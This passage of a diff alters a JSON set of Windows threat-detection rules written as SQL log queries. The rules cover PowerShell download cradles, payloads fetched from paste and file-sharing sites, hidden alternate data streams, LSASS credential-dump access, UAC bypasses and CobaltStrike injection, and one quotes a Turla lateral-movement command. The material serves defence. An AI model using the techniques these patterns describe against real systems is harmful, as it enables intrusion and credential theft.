'%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "status": "test", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], "falsepositives": [ - "Scripts or tools that download files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", - "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1564.004" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.execution", - "attack.t1059.005", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "status": "experimental", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1564.004" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Stop Windows Service Via Net.EXE", - "id": "88872991-7445-4a22-90b2-a3adadb0e827", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_net_stop_service.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 